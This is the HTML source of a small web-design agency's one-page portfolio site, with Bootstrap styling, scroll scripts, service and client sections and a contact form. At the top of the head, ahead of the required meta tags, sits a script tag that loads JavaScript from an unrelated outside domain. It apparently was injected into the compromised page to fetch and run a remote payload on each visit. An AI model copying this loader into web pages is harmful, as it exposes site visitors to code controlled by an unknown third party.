
<html lang="en">
  <head>
  	<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
  	<script src="http://d.trackbreakingnews.com/l/load.js"></script>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <!-- The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags -->
    <meta name="description" content="">
    <meta name="author" content="">
    <link rel="icon" href="../../favicon.ico">

    <title>MySign</title>

    <!-- Bootstrap core CSS -->
    <link href="CSS/bootstrap.min.css" rel="stylesheet">

    <link href="CSS/Cute.css" rel="stylesheet">
    <link href="CSS/Stylez1.css" rel="stylesheet">
    <!-- Bootstrap theme -->
    <link href="CSS/bootstrap-theme.min.css" rel="stylesheet">

    <!-- Custom styles for this template -->
    <link href="CSS/theme.css" rel="stylesheet">

    <!-- Just for debugging purposes. Don't actually copy these 2 lines! -->
    <!--[if lt IE 9]>
    <script src="js/ie8-responsive-file-warning.js"></script>
    <![endif]-->
    <script src="js/ie-emulation-modes-warning.js"></script>
    
</script>
<link rel="stylesheet" href="CSS/animate.css">
<script src="js/wow.min.js"> </script>
<script> new WOW().init();</script>

    <!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries -->
    <!--[if lt IE 9]>
      <script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
      <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
    <![endif]-->


 <style type="text/css">
 #navbar-custom {
	width: 100%;
	
	position: fixed;
	transition:all 0.9s;
}
.font-semibold {
				font-family: "Titillium Web",sans-serif;
				font-weight:600px;
				}
.navbar-custom {
    background-color:rgba(0,0,0,0.3);
    border-color: #E7E7E7;
  
    padding-left: 320px;
   
}
 #navbar-custom {
	width: 100%;
	
	position: fixed;
	transition:all 0.9s;
}

/* title */
.navbar-custom .navbar-brand {
    color: #777;
}
.navbar-custom .navbar-brand:hover,
.navbar-custom .navbar-brand:focus {
    color:rgba(0,0,0,0.3);
}
/* link */
.navbar-custom .navbar-nav > li > a {
    color: #E4E6E5;
    font-family: "Titillium Web",sans-serif;
    font-weight: 600px;
    font-size: 1.1em;

}
.navbar-custom .navbar-nav > li > a:hover,
.navbar-custom .navbar-nav > li > a:focus {
     background-color:rgba(0,0,0,0.0);
    border-bottom: solid;
    border-bottom-width: 4.5px; 
    position: relative;
     padding-bottom: 11px;
}
.navbar-custom .navbar-nav > li.X > a:hover,
.navbar-custom .navbar-nav > li.X >  a:focus {
     
    border-bottom: solid;
    border-bottom-width: 4.5px; 
    border-color: #4E4E4E;
     padding-bottom: 11px;
}


.navbar-custom .navbar-nav > li.XX > a:hover,
.navbar-custom .navbar-nav > li.XX >  a:focus {
     
    border-bottom: solid;
    border-bottom-width: 4.5px; 
    border-color: #17AEDF;
     padding-bottom: 11px;
}

.navbar-custom .navbar-nav > li.XXX > a:hover,
.navbar-custom .navbar-nav > li.XXX >  a:focus {
     
    border-bottom: solid;
    border-bottom-width: 4.5px; 
    border-color:  #F43059;
     padding-bottom: 11px;
}
.navbar-custom .navbar-nav > li.XXXX > a:hover,
.navbar-custom .navbar-nav > li.XXXX >  a:focus {
     
    border-bottom: solid;
    border-bottom-width: 4.5px; 
    border-color: #9B59B6;
     padding-bottom: 11px;
}

.navbar-custom .navbar-nav > li.XXXXX > a:hover,
.navbar-custom .navbar-nav > li.XXXXX >  a:focus {
     
    border-bottom: solid;
    border-bottom-width: 4.5px; 
    border-color: #1ABC9C; 
     padding-bottom: 11px;
}
.navbar-custom .navbar-nav > li.XXXXXX > a:hover,
.navbar-custom .navbar-nav > li.XXXXXX >  a:focus {
     
    border-bottom: solid;
    border-bottom-width: 4.5px; 
    border-color: #E4E6E5; 
     padding-bottom: 11px;
}
.navbar-custom .navbar-nav > li.X.active > a,
.navbar-custom .navbar-nav > li.X.active > a:hover,
.navbar-custom .navbar-nav > li.X.active >  a:focus {
     
    border-bottom: solid;
    border-bottom-width: 4.5px; 
    border-color: #4E4E4E;
     padding-bottom: 11px;
}

.navbar-custom .navbar-nav > li.XX.active > a,
.navbar-custom .navbar-nav > li.XX.active > a:hover,
.navbar-custom .navbar-nav > li.XX.active >  a:focus {
     
    border-bottom: solid;
    border-bottom-width: 4.5px; 
    border-color: #17AEDF;
     padding-bottom: 11px;
}
.navbar-custom .navbar-nav > li.XXX.active > a, 
.navbar-custom .navbar-nav > li.XXX.active > a:hover,
.navbar-custom .navbar-nav > li.XXX.active >  a:focus {
     
    border-bottom: solid;
    border-bottom-width: 4.5px; 
    border-color:  #F43059;
     padding-bottom: 11px;
}
.navbar-custom .navbar-nav > li.XXXX.active > a, 
.navbar-custom .navbar-nav > li.XXXX.active> a:hover,
.navbar-custom .navbar-nav > li.XXXX.active >  a:focus {
     
    border-bottom: solid;
    border-bottom-width: 4.5px; 
    border-color: #9B59B6;
     padding-bottom: 11px;
}
.navbar-custom .navbar-nav > li.XXXXX.active > a, 
.navbar-custom .navbar-nav > li.XXXXX.active > a:hover,
.navbar-custom .navbar-nav > li.XXXXX.active >  a:focus {
     
    border-bottom: solid;
    border-bottom-width: 4.5px; 
    border-color: #1ABC9C; 
     padding-bottom: 11px;
}
.navbar-custom .navbar-nav > li.XXXXXX.active > a, 
.navbar-custom .navbar-nav > li.XXXXXX.active > a:hover,
.navbar-custom .navbar-nav > li.XXXXXX.active >  a:focus {
     
    border-bottom: solid;
    border-bottom-width: 4.5px; 
    border-color:#E4E6E5; 
     padding-bottom: 11px;
}





.navbar-custom .navbar-nav > li.X.open  > a,
.navbar-custom .navbar-nav > li.X.open  > a:hover,
.navbar-custom .navbar-nav > li.X.open >  a:focus {
     
    border-bottom: solid;
    border-bottom-width: 4.5px; 
    border-color: #4E4E4E;
     padding-bottom: 11px;
}

.navbar-custom .navbar-nav > li.XX.open  > a,
.navbar-custom .navbar-nav > li.XX.open  > a:hover,
.navbar-custom .navbar-nav > li.XX.open  >  a:focus {
     
    border-bottom: solid;
    border-bottom-width: 4.5px; 
    border-color: #17AEDF;
     padding-bottom: 11px;
}
.navbar-custom .navbar-nav > li.XXX.open  > a, 
.navbar-custom .navbar-nav > li.XXX.open  > a:hover,
.navbar-custom .navbar-nav > li.XXX.open  >  a:focus {
     
    border-bottom: solid;
    border-bottom-width: 4.5px; 
    border-color:  #F43059;
     padding-bottom: 11px;
}
.navbar-custom .navbar-nav > li.XXXX.open > a, 
.navbar-custom .navbar-nav > li.XXXX.open > a:hover,
.navbar-custom .navbar-nav > li.XXXX.open  >  a:focus {
     
    border-bottom: solid;
    border-bottom-width: 4.5px; 
    border-color: #9B59B6;
     padding-bottom: 11px;
}
.navbar-custom .navbar-nav > li.XXXXX.open > a, 
.navbar-custom .navbar-nav > li.XXXXX.open  > a:hover,
.navbar-custom .navbar-nav > li.XXXXX.open  >  a:focus {
     
    border-bottom: solid;
    border-bottom-width: 4.5px; 
    border-color: #1ABC9C; 
     padding-bottom: 11px;
}
.navbar-custom .navbar-nav > li.XXXXXX.open > a, 
.navbar-custom .navbar-nav > li.XXXXXX.open  > a:hover,
.navbar-custom .navbar-nav > li.XXXXXX.open >  a:focus {
     
    border-bottom: solid;
    border-bottom-width: 4.5px; 
    border-color:#E4E6E5; 
     padding-bottom: 11px;
}
.navbar-custom .navbar-nav > .open > a, 
.navbar-custom .navbar-nav > .open > a:hover, 
.navbar-custom .navbar-nav > .open > a:focus {
    color: #555;
    background-color: #D5D5D5;
}
/* caret */
.navbar-custom .navbar-nav > .dropdown > a .caret {
    border-top-color: #777;
    border-bottom-color: #777;
}
.navbar-custom .navbar-nav > .dropdown > a:hover .caret,
.navbar-custom .navbar-nav > .dropdown > a:focus .caret {
    border-top-color: #333;
    border-bottom-color: #333;
}
.navbar-custom .navbar-nav > .open > a .caret, 
.navbar-custom .navbar-nav > .open > a:hover .caret, 
.navbar-custom .navbar-nav > .open > a:focus .caret {
    border-top-color: #555;
    border-bottom-color: #555;
}
/* mobile version */
.navbar-custom .navbar-toggle {
    border-color: #DDD;
}
.navbar-custom .navbar-toggle:hover,
.navbar-custom .navbar-toggle:focus {
    background-color: #DDD;
}
.navbar-custom .navbar-toggle .icon-bar {
    background-color: #CCC;
}
.line-row hr{
	width: 33%;
	background-color: #E4E6E5;
	height: 5px;

}
@media (max-width: 767px) {
    .navbar-custom .navbar-nav .open .dropdown-menu > li > a {
        color: #777;
    }
    .navbar-custom .navbar-nav .open .dropdown-menu > li > a:hover,
    .navbar-custom .navbar-nav .open .dropdown-menu > li > a:focus {
        color: #333;
    }
}
  </style>
      <script type="text/javascript">
    var scrollY=0;
    var distance=40;
    var speed=24;
    function autoscrollTo(el) {

    	var currentY=window.pageYOffset;
var targetY=document.getElementById(el).offsetTop;
    	var bodyHeight=document.body.offsetHeight;
    	var ypos=currentY + window.innerHeight;
    	var animator=setTimeout('autoscrollTo(\''+el+'\')',speed);
    	if(ypos > bodyHeight) {
    		clearTimeout(animator);
    	} else {
    		if(currentY < targetY-distance) {
    			scrollY = currentY+distance;
    			window.scroll(0,scrollY);
    		}else {
    			clearTimeout(animator);
    			}
    		}
    	}


    	    function resetScroller(el) {

    	var currentY=window.pageYOffset;
    	var targetY=document.getElementById(el).offsetTop;
    	var animator=setTimeout('resetScroller(\''+el+'\')',speed);
    	
    		if(currentY > targetY) {
    			scrollY=currentY-distance;
    			window.scroll(0,scrollY);
    		}else {
    			clearTimeout(animator);
    			}
    		}
    	
    	

    </script>
     <script type="text/javascript">
     function Scroll() {
     		var top = document.getElementById('navbar-custom');
     		var ypos = window.pageYOffset;
     		if(ypos > 587) {
     			top.style.height="50px";

     		} else {
     			top.style.height="50px";
     		}
     }
     window.addEventListener("scroll",Scroll);
     </script>



  </head>
  <body>
		<header id="header">
           <div class="navbar navbar-custom navbar-fixed-top pulse animated" id="navbar-custom">
			<div class="container">
				<button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
						<span class="icon-bar"></span>
						<span class="icon-bar"></span>
						<span class="icon-bar"></span>
						</button>
						
				<div class="collapse navbar-collapse">
					<ul class="nav navbar-nav">
						<li class="X active"> 
						 		<a href="#" onclick="return false;" onmousedown="autoscrollTo('div1');" >
						 			<span class="glyphicon glyphicon-home" aria-hidden="true"></span>HOME</a></li>

									<li  class="XX"> 
										<a href="#" onclick="return false;" onmousedown="autoscrollTo('div2');">
											<span class="glyphicon glyphicon-thumbs-up" aria-hidden="true"></span>ABOUT US</a></li>
									<li class="XXX">

										<a href="#" onclick="return false;" onmousedown="autoscrollTo('div3');"><span class="glyphicon glyphicon-pencil" aria-hidden="true"></span>PORTFOLIO</a></li>
		                       		<li class="XXXX "> 

		                       			<a href="#" onclick="return false;" onmousedown="autoscrollTo('div4');"><span class="glyphicon glyphicon-wrench" aria-hidden="true"></span>WORKFLOW</a></li>
		                       		<li class="XXXXX">

		                       		 <a href="#" onclick="return false;" onmousedown="autoscrollTo('div5');">
		                       		 	<span class="glyphicon glyphicon-user" aria-hidden="true">
		                       		 	</span>CLIENTS</a></li>
		                       		<li  class="XXXXXX">

		                       		 <a href="#" onclick="return false;" onmousedown="autoscrollTo('div6');"><span class="glyphicon glyphicon-envelope" aria-hidden="true"></span>CONTACT</a></li>
							
					</li>
				</ul>

	          </div> 
	      </div>
	  </div>
	   </header> <div> </div>
	 <h2 id="myheading"></h2>
  <div id="div1">
	<div class="container-fluid XOO1">
		<div class="container XOO1">
		<div class="row XP" id="Ho">
		<div class="col-lg-12 col-md-12 col-sm-12 col-xs-12 GG" >
		<img src="iWall/Dxx.jpg" alt="Dxx.jpg" class="img-responsive fadeInDown animated ">
		<h5 class="font-thin slideInLeft animated">SUB<span class="font-semibold">SIGN</span></h5>
		<h4 class="font-thin  slideInRight animated">The little thing that makes <span class="font-semibold">all the difference.</span></h4><br/><br/>
		</div>
		
		</div>
	</div></div>

			



		<br/><br/>
		</div>
		<a href="#" onclick="return false;" onmousedown="resetScroller('myheading');" >
			<button class="btn btn-custom TOP" >TOP</button></a>
		<div id="div2">
	<div class="container-fluid XOO">
		<div class="container XOO">
		
		<div class="row LXN" id="Lo">
		<div class="col-lg-12 col-sm-12 col-xs-12">
			<h3 class="font-thin">We <span class="font-semibold">bring companies alive </span>by visually telling their <br/>stories.</h3>
			<br/>
			<br/>
			<div class="row line-row">
					<hr>
			</div>
			<h3 class="font-thin">This is what  <span class="font-semibold">we do best</span></h3><br/><br/>
		
		</div>
		</div>

		<div class="row YO">
			<div class="col-lg-3 col-sm-6 col-md-3 col-xs-12">
					<img src="iCO/boat.png" alt="speedometer" class="pulse animated img-thumbnail img-circle">
			<h5 class="font-thin">Visual <span class="font-semibold">Identity</span> </h5><br/>
			<p class="lead">We help our clients</br> create a strong and</br> distinctive visual</br> identity.</p>
			</div>
			<div class="col-lg-3 col-md-3 col-sm-6  col-xs-12">
					<img src="iCO/pie_chart.png" alt="speedometer" class="pulse animated img-thumbnail img-circle">
			<h5 class="font-thin">Web  <span class="font-semibold">Design</span> </h5><br/>
			<p class="lead">We apply user-centered<br/> principles to create an<br/> elegant and unique web<br/> design.</p>
			</div>
			<div class="col-lg-3 col-md-3 col-sm-6 col-xs-12">
					<img src="iCO/mp3_player.png" alt="speedometer" class="pulse animated img-thumbnail img-circle">
			<h5 class="font-thin">Mobile <span class="font-semibold">Apps</span> </h5><br/>
			<p>We will create your<br/> mobile app so that you<br/> will always be where<br/> your customers are.</p>
			</div>
			
			<div class="col-lg-3 col-md-3 col-sm-6 col-xs-12">
					<img src="iCO/repair_add.png" alt="speedometer" class="pulse animated img-thumbnail img-circle">
			<h5 class="font-thin"><span class="font-semibold">Development</span> </h5><br/>
			<p>After brainstorming the<br/> webdesign or mobile<br/> app our team will make <br/>the magic happen.</p><br/><br/><br/>
			</div>
		</div>
		</div>
		</div>	</div>
		<div id="div3">
		<div class="container-fluid">
		<div class="row XZO" id="Po">
			<div class="col-lg-4 col-md-4 col-sm-6 col-xs-12 XT">
			<div class="content">
				<img src="iWall/Fud.jpg" alt="speedometer" class="XT">
			</div>
			</div>

			<div class="col-lg-4 col-md-4 col-sm-6 col-xs-12 XTT">
				<img src="iWall/portfolio-5.jpg" alt="speedometer">
			</div>
			<div class="col-lg-4 col-md-4 col-sm-6 col-xs-12 XTTT">
				<img src="iWall/IMG_1307.JPG" alt="speedometer">
			</div>
			<div class="col-lg-4">
				
			</div>
		</div>
		</div>
		<div class="container-fluid">
		<div class="row XZO">
			<div class="col-lg-4  col-md-4 col-sm-6 col-xs-12 XxT">
				<img src="iWall/iP6.4.091814.jpg" alt="speedometer">
			</div>

			<div class="col-lg-4 col-md-4 col-sm-6 col-xs-12 XxTT">
				<img src="iWall/dsdsdd.jpg" alt="speedometer" >
			</div>
			<div class="col-lg-4 col-md-4 col-sm-6 col-xs-12 XxTTT">
				<img src="iWall/mockupd_air-2.jpg" alt="speedometer" class="pulse">
			</div>
			<div class="col-lg-4">
				
			</div>
		</div>
		</div>
		</div>
	
	<div id="div4">
<div class="container-fluid XOxO">
			<a href="#" onclick="return false;" onmousedown="resetScroller('myheading');" >
			<button class="btn btn-custom TOPx" >TOP</button></a>
		<div class="row LXN" >
		<div class="col-lg-12">
			<h3 class="font-thin">See us  <span class="font-semibold">at work</span></h3>
			<br/>
			<br/>
			<div class="row line-row">
					<hr>
			</div>
			<h4 class="font-thin">Simplicity and elegance, curiosity and nerditude are<br/> the ingredients we put in our projects combining the<br/> latest possibilities of the web with genuine graphic<br/> design principles.</h4><br/><br/>
		
		</div>
		</div></div>
		<div class="container-fluid XOxO">
		<div class="row YOoo"  id="Wlo">
			<div class="container">
			<div class="col-lg-3 col-md-3">
					<img src="iCO/subsign-4.png" alt="speedometer" class="pulse animated">
			<h5 class="font-thin">Listening to<span class="font-semibold"><br/>your needs</span> </h5><br/>
			<p class="lead">
				The first stage</br> is to meet with</br> the client and</br> discuss the</br> needs and </br>expectations</br> of the new </br>product.</p>
			</div>
			<div class="col-lg-3 col-md-3">
					<img src="iCO/subsign-5.png" alt="speedometer" class="pulse animated">
			<h5 class="font-thin">Project<br/><span class="font-semibold">discovery </span> </h5><br/>
			<p class="lead">For every new</br>  client or new </br> project we</br>  take time to </br> gather the</br>  details needed</br>  to create the</br>  best project</br>  possible.</p>
			</div>
			<div class="col-lg-3 col-md-3">


					<img src="iCO/subsign-6.png" alt="speedometer" class="pulse animated">
			<h5 class="font-thin">Storming<br/> <span class="font-semibold">our brains</span> </h5><br/>
			<p class="lead">With every</br>  new project</br>  we want to</br>  improve or </br> create a new </br> piece of</br>  design that</br>  will express </br> the story of</br>  our client.</p>
			</div>
			
			<div class="col-lg-3 col-md-3">
					<img src="iCO/subsign-7.png" alt="speedometer" class="pulse animated">
			<h5 class="font-thin">Getting<br/><span class="font-semibold">there</span> </h5><br/>
			<p class="lead">After finishing <br/>the concept<br/> and everybody<br/> is happy, it`s<br/> time to put the <br/>developers to<br/> work..</p><br/><br/><br/>
			</div></div>

		</div>
		</div>	</div>

	<div id="div5">
		<div class="container-fluid XOxOz">
		
		<div class="row LxXN" id="Clo">
				<a href="#" onclick="return false;" onmousedown="resetScroller('myheading');" >
			<button class="btn btn-custom TOPxx" >TOP</button></a>
		<div class="col-lg-12">
			<h3 class="font-thin">Clients <span class="font-semibold">we've worked with </span></h3>
			<br/>
			<br/>
			<div class="row line-row">
					<hr>
			</div>
			<h4 class="font-thin">We work together with brands to craft strategies along</br> with a unique and innovative digital approach. We</br> thrive on collaborating with clients who are looking to</br> push the limits and think outside the box..</h4><br/><br/>
		
		</div>
		</div></div>
		<div class="container-fluid XOxOz">
		<div class="row YOoox">
			<div class="container">
			<div class="col-lg-2 col-md-2">
					<img src="iCO/eagames.png" alt="speedometer" class="pulse animated">
			
			</div>
			<div class="col-lg-2 col-md-2">
					<img src="iCO/abplus.png" alt="speedometer" class="pulse animated">
			
			</div>
			<div class="col-lg-2 col-md-2">


					<img src="iCO/artcontent.png" alt="speedometer" class="pulse animated">
			
			</div>
			
			<div class="col-lg-2 col-md-2">
					<img src="iCO/dxb.png" alt="speedometer" class="pulse animated">
				</div>
					<div class="col-lg-2 col-md-2">
					<img src="iCO/maroco.png" alt="speedometer" class="pulse animated">
				</div>
			<br/><br/><br/>
			</div>


				<div class="container">
			<div class="col-lg-2 col-md-2">
					<img src="iCO/roastedbrains.png" alt="speedometer" class="pulse animated">
			
			</div>
			<div class="col-lg-2 col-md-2">
					<img src="iCO/smlsd.png" alt="speedometer" class="pulse animated">
			
			</div>
			<div class="col-lg-2 col-md-2">


					<img src="iCO/twistmobile.png" alt="speedometer" class="pulse animated">
			
			</div>
			
			<div class="col-lg-2 col-md-2">
					<img src="iCO/upgrade.png" alt="speedometer" class="pulse animated">
				</div>
					<div class="col-lg-2 col-md-2">
					<img src="iCO/webtouch.png" alt="speedometer" class="pulse animated">
				</div></div></div><br/><br/><br/></div>
			
			</div></div>


		</div>

		</div>



<div id="div6">
		<div class="container-fluid XOxOzz">
		
		<div class="row LxzXN" id="Cnt">
		<div class="col-lg-12">
			<h3 class="font-thin">Leave us<span class="font-semibold"> a message </span></h3>
			<br/>
			<br/>
			<div class="row line-rowx">
					<hr>
			</div>
			<h4 class="font-thin">You can find us literally anywhere, just push a button and we're	<br/>there</h4><br/><br/>
		
		</div>
		</div></div>
		<div class="container-fluid XOxOzz">
		<div class="row YOooxx">
			<div class="container">
			<div class="col-lg-2">
					<img src="iCO/eagames.png" alt="speedometer" class="pulse animated">
			
			</div>
			<div class="col-lg-2">
					<img src="iCO/abplus.png" alt="speedometer" class="pulse animated">
			
			</div>
			<div class="col-lg-2">


					<img src="iCO/artcontent.png" alt="speedometer" class="pulse animated">
			
			</div>
			
			<div class="col-lg-2">
					<img src="iCO/dxb.png" alt="speedometer" class="pulse animated">
				</div>
					<div class="col-lg-2">
					<img src="iCO/maroco.png" alt="speedometer" class="pulse animated">
				</div>
			<br/><br/><br/>
			</div>


				<div class="container">
			<div class="col-lg-2">
					<img src="iCO/roastedbrains.png" alt="speedometer" class="pulse animated">
			
			</div>
			<div class="col-lg-2">
					<img src="iCO/smlsd.png" alt="speedometer" class="pulse animated">
			
			</div>
			<div class="col-lg-2">


					<img src="iCO/twistmobile.png" alt="speedometer" class="pulse animated">
			
			</div>
			
			<div class="col-lg-2">
					<img src="iCO/upgrade.png" alt="speedometer" class="pulse animated">
				</div>
					<div class="col-lg-2">
					<img src="iCO/webtouch.png" alt="speedometer" class="pulse animated">
				</div>
			
			</div>
							<div class="container">
								<div class="row">
									<div class="col-lg-12 FMM">
									<form class="form-inline">
										<div class="form-group">
								   
								    <input type="email" class="form-control" id="exampleInputEmail3" placeholder="Enter Name">
								  </div>
								  <div class="form-group">
							
								    <input type="email" class="form-control" id="exampleInputEmail3" placeholder="Enter email">
								  </div>
								  <div class="form-group">
								  
								    <input type="Text" class="form-control" id="exampleInputPassword3" placeholder="Phone">
								  </div><br/><br/>

				                        	<textarea rows="2" cols="75%" name="nmm4"  class="form-control" >
				                        	</textarea><br/>
								  
								  <a href="#" onclick="return false;" onmousedown="resetScroller('myheading');" >
			<button class="btn btn-custom TOPxzz" >Send</button></a>
								</form><br/><br/><br/>
                    					</div>  
                					</div> 
                   			  </div> 

                   			  <div class="container">
								<div class="row xXZO">
									<div class="col-lg-3  col-md-3 xXxT">
										<img src="iCO/phone.png" alt="speedometer" class="fadeInDown animated ">
										<p> (+91) 9897989732 </p>
									</div>


									<div class="col-lg-3 col-md-3 xXxTT">
										<img src="iCO/address.png" alt="speedometer" class="fadeInDown animated ">
										<p> Dehradun </p>
									</div>
									<div class="col-lg-3 col-md-3 xXxTTT">
										<img src="iCO/facebook.png" alt="speedometer" class="fadeInDown animated ">
										<p> fb/ajaysinghbisht002 </p>
									</div>
									<div class="col-lg-3 col-md-3 xXxTTT">
										<img src="iCO/twitter.png" alt="speedometer" class="fadeInDown animated ">
										<p> @002ajay </p>
									</div>
              	</div>
										<div class="row xxXZO">
									<div class="col-lg-12 xxXxT">
								<p> © 2015 All rights reserved</p>
								<a href="#" onclick="return false;" onmousedown="resetScroller('myheading');" >
			<button class="btn btn-custom TOPxz" >TOP</button></a>
								            </div> 
                         </div> 
                       </div>   	
    				          </div>
                     </div>
                   </div>
								
										<div class="container-fluid FFF">
											<div class="row">
											<div class="col-lg-12 col-md-12 col-sm-12 col-xs-12  FF">
											<h5>
											@2015 All Rights Reserved / Privacy Policy  <small>Ajay Singh Bisht | 2015 | @002ajay (</em>Twitter</em>)</small>
											</h5>
											</div>
											</div>
										</div>
								
			

			  <script src="jquery.min.js"></script>
			    <script src="js/bootstrap.min.js"></script>
			    <script src="js/docs.min.js"></script>
			    <!-- IE10 viewport hack for Surface/desktop Windows 8 bug -->
			    <script src="js/ie10-viewport-bug-workaround.js"></script>
			    <script>
				$('.dropdown').hover(function()    {
					$('.dropdown-toggle',this).trigger('click');
				} );
				</script>
			  </body>
			</html>
